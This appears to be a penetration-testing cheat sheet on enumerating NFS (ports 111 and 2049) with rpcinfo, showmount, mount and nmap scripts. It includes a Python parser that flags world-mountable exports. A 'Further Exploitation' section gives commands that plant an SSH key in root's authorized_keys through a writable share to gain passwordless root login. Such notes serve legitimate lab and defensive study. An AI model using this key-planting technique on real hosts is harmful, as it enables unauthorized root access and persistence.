# NFS Enumeration (Port 111, 2049)

## Quick Intro <a href="#quick-intro" id="quick-intro"></a>

* Developed in 1984 by Sun Microsystems; similar to SMB in that it allows access to files over a network.
* Common ports used by NFS are **111 and 2049, tcp/udp**
* It is a client/server system that allows users to access files across a network and treat them as if they resided in a local directory.

## Identifying if NFS is in use <a href="#identifying-if-nfs-is-in-use" id="identifying-if-nfs-is-in-use"></a>

```
rpcinfo -p <ip>

# If ports 111 (portmapper) and 2049 (nfs) are listed, NFS is enabled and the shares can be mounted
```

## Show all mounts <a href="#show-all-mounts" id="show-all-mounts"></a>

* If NFS is available, use **showmount** to list the available mount points (exports)

```
showmount -e $ip
```
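An added helper, not part of the original cheat sheet, that turns the two enumeration steps above into a check: it parses `rpcinfo -p` output to confirm that portmapper, mountd and nfs are all registered, and parses `showmount -e` output to flag exports that any client may mount. The sample outputs are constructed, not captured from a real host.

```python
# Added example: parse `rpcinfo -p` and `showmount -e` output.
# Both samples below are constructed for illustration.

RPCINFO_SAMPLE = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100005    1   tcp  33045  mountd
    100003    3   tcp   2049  nfs
    100003    3   udp   2049  nfs
"""

SHOWMOUNT_SAMPLE = """\
Export list for 10.0.0.5:
/home       *
/srv/backup 10.0.0.0/24,192.168.1.5
/srv/www    (everyone)
"""

def parse_rpcinfo(text):
    """Return {service_name: set_of_ports} from `rpcinfo -p` output."""
    services = {}
    for line in text.splitlines():
        parts = line.split()
        # Skip the header row and anything that is not a service line
        if len(parts) < 5 or not parts[3].isdigit():
            continue
        _prog, _vers, _proto, port, name = parts[:5]
        services.setdefault(name, set()).add(int(port))
    return services

def nfs_in_use(services):
    """NFS is mountable only when portmapper, mountd and nfs are all registered."""
    return {"portmapper", "mountd", "nfs"}.issubset(services)

def parse_showmount(text):
    """Return [(export_path, [client_specs])] from `showmount -e` output."""
    exports = []
    for line in text.splitlines():
        if line.startswith("Export list") or not line.strip():
            continue
        path, _, clients = line.partition(" ")
        exports.append((path, [c for c in clients.strip().split(",") if c]))
    return exports

def world_mountable(exports):
    """Exports whose client list allows everyone ('*' on Linux, '(everyone)' elsewhere)."""
    return [p for p, clients in exports
            if any(c in ("*", "(everyone)") for c in clients)]
```

Feed it real output with `parse_rpcinfo(open("rpcinfo.txt").read())`; exports returned by `world_mountable` are the ones to review first.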

## Mount an NFS share <a href="#mount-a-nfs-share" id="mount-a-nfs-share"></a>

* You can then mount the file system with the **mount** command and interact with the remote system
* First create the directory to mount on, then mount the export

```
mkdir /mnt/nfs
mount -t nfs $ip:/share /mnt/nfs
```

## Unmounting the shares <a href="#unmounting-the-shares" id="unmounting-the-shares"></a>

```
umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS system). (Requires kernel 2.1.116 or later.)
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and clean up all references to the filesystem as soon as it is not busy anymore. (Requires kernel 2.4.11 or later.)
```

## Permission Denied? <a href="#permission-denied" id="permission-denied"></a>

{% embed url="https://blog.christophetd.fr/write-up-vulnix" %}

## Further Exploitation <a href="#further-exploitation" id="further-exploitation"></a>

* **If you can write to the remote host, try to put an SSH key there** so that you can get remote SSH access without a password:

```
ssh-keygen
# Generate an SSH key pair (the public key is written to ~/.ssh/id_rsa.pub)

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Append it to the remote host's authorized_keys through the mounted share

ssh root@$ip
# Now you can log in to the target without a password
```

## Nmap Scan on RPCbind and NFS <a href="#nmap-scan-on-rpcbind-and-nfs" id="nmap-scan-on-rpcbind-and-nfs"></a>

```
nmap -v -p 111 10.11.1.1-254
# Find hosts with rpcbind (port 111) open

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
# Enumerate the RPC services registered with rpcbind

nmap -p 111 --script "nfs*" 10.11.1.72
# Run all NSE nfs-* scripts (quoted so the shell does not expand the glob)
```
